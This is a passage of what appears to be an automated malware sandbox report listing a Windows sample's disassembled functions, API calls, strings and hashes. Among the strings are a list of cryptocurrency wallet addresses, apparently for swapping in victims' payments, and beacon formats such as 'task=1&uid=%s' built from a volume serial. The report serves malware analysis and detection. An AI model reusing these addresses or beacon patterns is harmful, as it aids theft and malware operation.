                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                        • API String ID: 2382078925-3773165574
                                                                                        • Opcode ID: 21d35d6f7c0a6df29142ddf1a1bf3c38aef0ed986b01762a66452d2035f17931
                                                                                        • Instruction ID: 428b9d20fc872077089526690c08c182e5bbb8451a760fbd30c6921b96358b0c
                                                                                        • Opcode Fuzzy Hash: 21d35d6f7c0a6df29142ddf1a1bf3c38aef0ed986b01762a66452d2035f17931
                                                                                        • Instruction Fuzzy Hash: 7142923660DBD190DA75EB25F4902EAB3A5FBC8B80F805136DA8D47B5AEF2CD144CB50
                                                                                        Function 00007FF795D3796B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception_getptd$DestructObject$Raise_getptd_noexit
                                                                                        • String ID: csm
                                                                                        • API String ID: 2851507484-1018135373
                                                                                        • Opcode ID: 64d00ee2830e9379cd3ef173d90ae30a9ca42842e8ef135b9074179a121e00c4
                                                                                        • Instruction ID: 8a021628e8b8212053ade76f6e9d7d6775b15000fb2b68f2b22b13607d274801
                                                                                        • Opcode Fuzzy Hash: 64d00ee2830e9379cd3ef173d90ae30a9ca42842e8ef135b9074179a121e00c4
                                                                                        • Instruction Fuzzy Hash: 99212C7660865182D630EF25E08036EB7A0F785FA9F445231DE9D07795DF3DE585CB20
                                                                                        Function 00007FF795D1CA20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 1826629674-3145022300
                                                                                        • Opcode ID: 6686d453f540abfc75b9a040e882549689efe832026ee8754cd51114fbe3f1ce
                                                                                        • Instruction ID: 53dee408e4e0c834a501b17930bc9e57cca26fa9d0e61dfad506b9a8ff112bfb
                                                                                        • Opcode Fuzzy Hash: 6686d453f540abfc75b9a040e882549689efe832026ee8754cd51114fbe3f1ce
                                                                                        • Instruction Fuzzy Hash: C521FE2251CA5581DA70EB25F4D026AF3E0FB84BA4F906231EA9E437B9DF3CD545CB10
                                                                                        Function 00007FF795D1C920 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 1826629674-3145022300
                                                                                        • Opcode ID: 932e2d8308b347af2fb822a83c7166a45b16841b8f045a10c064c8219c059d73
                                                                                        • Instruction ID: 8ea96d18ac44de332d11e4b9e5e9ec668cf93ff01b1a8cd2681b243f01053ac4
                                                                                        • Opcode Fuzzy Hash: 932e2d8308b347af2fb822a83c7166a45b16841b8f045a10c064c8219c059d73
                                                                                        • Instruction Fuzzy Hash: B321FD2251CA5581DA70EB25F4C026AF3E0FB84BA4F906232EA9E437B9DF3CD545CB50
                                                                                        Function 00007FF795D363C4 Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2523592665-0
                                                                                        • Opcode ID: 9dc3a43cf0aa1fcfdc29037b235636b50873e9ffe005ada4d84142dea13232af
                                                                                        • Instruction ID: 3208dd24aef2df6338e84e765c0a9385e5ca3275e81754d4b5dcde6d1fb7b006
                                                                                        • Opcode Fuzzy Hash: 9dc3a43cf0aa1fcfdc29037b235636b50873e9ffe005ada4d84142dea13232af
                                                                                        • Instruction Fuzzy Hash: 9A619126B08B6192EA34AF26F980269B3E0FB84F98F845135DE4D07B55DF3CE466C350
                                                                                        Function 00007FF795D31D88 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 64063577f5759fc087550664f9166848bfe9c81f154bd90bd0409ab7649f8bd4
                                                                                        • Instruction ID: 729cbd9a5d864f173f3aa52b6ccb47841da140a57d4f0f93166782017c4842e4
                                                                                        • Opcode Fuzzy Hash: 64063577f5759fc087550664f9166848bfe9c81f154bd90bd0409ab7649f8bd4
                                                                                        • Instruction Fuzzy Hash: DF21E652E0C6A382EB7077B1A0C0379D2E0AF84F98F906230E55D067CDDE7DD5458720
                                                                                        Function 00007FF795D2FEC8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 299056699-0
                                                                                        • Opcode ID: fded58dde77be56de6fab05177e5339cc4062db6b0d45a6a30c187912645d6f3
                                                                                        • Instruction ID: f6646fc7d8c5ad2e252b1682fee77c4eee32f257b9ffc1bb7b8348aadf26e7df
                                                                                        • Opcode Fuzzy Hash: fded58dde77be56de6fab05177e5339cc4062db6b0d45a6a30c187912645d6f3
                                                                                        • Instruction Fuzzy Hash: 9401922691CA9282F730AB31F8D5229A3B0FBC9F45F841575EA8E46668CF3CD955C720
                                                                                        Function 00007FF795D25414 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Decorator::getMtx_guardMtx_guard::~_TableTypetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 4074051914-0
                                                                                        • Opcode ID: f014fbc6859682eefceef7ecbbf1b7741ac91cddb56665be6d968ce3dc7cad67
                                                                                        • Instruction ID: cf02b99f7b08ab353202b64eb28d1af362c8ae52c00b3807d63f1f8eab7123cf
                                                                                        • Opcode Fuzzy Hash: f014fbc6859682eefceef7ecbbf1b7741ac91cddb56665be6d968ce3dc7cad67
                                                                                        • Instruction Fuzzy Hash: 1FD19426609BC985DA70DB5AE4903AAB3A1F7C9BC0F905126DECD87B69DF38D444CB01
                                                                                        Function 00007FF795D18980 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Mtx_guardMtx_guard::~__aligned_msizetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 1928733530-0
                                                                                        • Opcode ID: 09518546536a787895912284108b7650a63c47b0a4a23c6140e26a573662d104
                                                                                        • Instruction ID: 92735dad5d8e20f9f25cf3d82f038fcf7df6ec70cbce91ce4eabb15ab8382422
                                                                                        • Opcode Fuzzy Hash: 09518546536a787895912284108b7650a63c47b0a4a23c6140e26a573662d104
                                                                                        • Instruction Fuzzy Hash: AD719826A18B84C2DA60DB2AE49026EA7A0F7C8BD4F505136EF8D43B69CF3CD541CF00
                                                                                        Function 00007FF795D18C60 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Mtx_guardMtx_guard::~__aligned_msizetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 1928733530-0
                                                                                        • Opcode ID: 4325eb878f5f8b404332b1c80043bf9b581a45e85f0c9479c12b2f4d25b8355e
                                                                                        • Instruction ID: 208a11dc235357261a4cdf97e5bc5879a44f30b49306e24bdd12a26d2a0e2a0a
                                                                                        • Opcode Fuzzy Hash: 4325eb878f5f8b404332b1c80043bf9b581a45e85f0c9479c12b2f4d25b8355e
                                                                                        • Instruction Fuzzy Hash: 71718826A18B94C2DA60DB6AE49026EA7A0F7C8BD4F505136EF8D43B69CF3CD541CF10
                                                                                        Function 00007FF795D3F30C Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1573762532-0
                                                                                        • Opcode ID: a13fad1822833028ca0eb10c8db0b597438e1cbbeed43b07fa581a08987f042d
                                                                                        • Instruction ID: e498d973ec54f138fa0dfc82643efb70466217535b24b638e01c3369937af7b2
                                                                                        • Opcode Fuzzy Hash: a13fad1822833028ca0eb10c8db0b597438e1cbbeed43b07fa581a08987f042d
                                                                                        • Instruction Fuzzy Hash: 5441B462E182BB81EE74BB3199805B9E2E0EF50F98FD86131DA9D476C5DB3CE5418720
                                                                                        Function 00007FF795D33424 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 9ed3336eb9426492d7b9aa9cf18bd71b667003e75d89d3dfa61ab95dda06c464
                                                                                        • Instruction ID: 37628b074db97ca4668aca13de1d28945d5516223925efd45edafb7e51975f69
                                                                                        • Opcode Fuzzy Hash: 9ed3336eb9426492d7b9aa9cf18bd71b667003e75d89d3dfa61ab95dda06c464
                                                                                        • Instruction Fuzzy Hash: 8D41D662E182B381EB75BB2592801BDB2E0EF50FA9FD45136E69D076C4DE3CE951C720
                                                                                        Function 00007FF795D30D0C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu$C$\
                                                                                        • API String ID: 3001812590-4231652159
                                                                                        • Opcode ID: 7bd2a999512e55fdd9f8ee897116d2d3bdff1adfd49b806867a6735701cc4331
                                                                                        • Instruction ID: f59f9cd306308a585f0b8bb0dda7f3742e630286c10cdbdff944870ec89a94a4
                                                                                        • Opcode Fuzzy Hash: 7bd2a999512e55fdd9f8ee897116d2d3bdff1adfd49b806867a6735701cc4331
                                                                                        • Instruction Fuzzy Hash: B4315E3220C69186E7219B68F4903AAFBA0E7C5B08F941035E68D47B98DF7ED944CB50
                                                                                        Function 00007FF795D37A68 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd
                                                                                        • String ID: MOC$RCC$csm
                                                                                        • API String ID: 3186804695-2671469338
                                                                                        • Opcode ID: 8894c65672d227fda39ec56e5dcad6079c82dd72da27f0faa52aa83d8d89759d
                                                                                        • Instruction ID: ed7afc1b3c6a0331e7f8ec7ec73cb1849feafd9ee050d7cba3a8243099b4851e
                                                                                        • Opcode Fuzzy Hash: 8894c65672d227fda39ec56e5dcad6079c82dd72da27f0faa52aa83d8d89759d
                                                                                        • Instruction Fuzzy Hash: 0BF01C35D08526D5E6B57BB180C53BC6AD0EF98F4DFD9B471C20C02382EBBD67908A22
                                                                                        Function 00007FF795D2C9D0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep$DirectoryInformationVolumeWindows_errno_invalid_parameter_noinfo_snprintfwsprintf
                                                                                        • String ID: data=$err$task=1&uid=%s
                                                                                        • API String ID: 1865811002-1781340663
                                                                                        • Opcode ID: 0af1d471e20986adbd40fd4a058f03d5b486d937defcffe757d3d044ca000848
                                                                                        • Instruction ID: 4827590636c7ecbd60b2b4b505c097c270b8258caef62e07a30c6f1789b7884f
                                                                                        • Opcode Fuzzy Hash: 0af1d471e20986adbd40fd4a058f03d5b486d937defcffe757d3d044ca000848
                                                                                        • Instruction Fuzzy Hash: BF41402261C59196E770EB24E4943AAA7E1F7C8B94F905231E68D83BE8DF3CD945CB10
                                                                                        Function 00007FF795D303F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                        • String ID: Unknown
                                                                                        • API String ID: 4220601557-1654365787
                                                                                        • Opcode ID: 1dfae691d3f300e8eb9ec59fb40c600c63e8ff47fd4a1043f669c2907b9887a7
                                                                                        • Instruction ID: 54ae626a023e515bd5f034eadbcd8ce8c8b62dc49a97fa13351391d1f4e2d8ed
                                                                                        • Opcode Fuzzy Hash: 1dfae691d3f300e8eb9ec59fb40c600c63e8ff47fd4a1043f669c2907b9887a7
                                                                                        • Instruction Fuzzy Hash: C421BA7661CA9486D770DB25E48476EA3E0F788B44F401235EACD83B68DF3DD654CB14
                                                                                        Function 00007FF795D302E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                        • API String ID: 779948276-85274793
                                                                                        • Opcode ID: beb93c632a34156963fe64735a9b928f099ba9484622690a6d160c2725b03238
                                                                                        • Instruction ID: 7c6defd7781a37b487eaaad75a2736f860b4abf66ca2a3fb21b34f345894aa96
                                                                                        • Opcode Fuzzy Hash: beb93c632a34156963fe64735a9b928f099ba9484622690a6d160c2725b03238
                                                                                        • Instruction Fuzzy Hash: C601ED76629A5086D7A0DF25F48575AB7A4F784B94F802135FB8E43B68DF3CC145CB00
                                                                                        Function 00007FF795D113A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
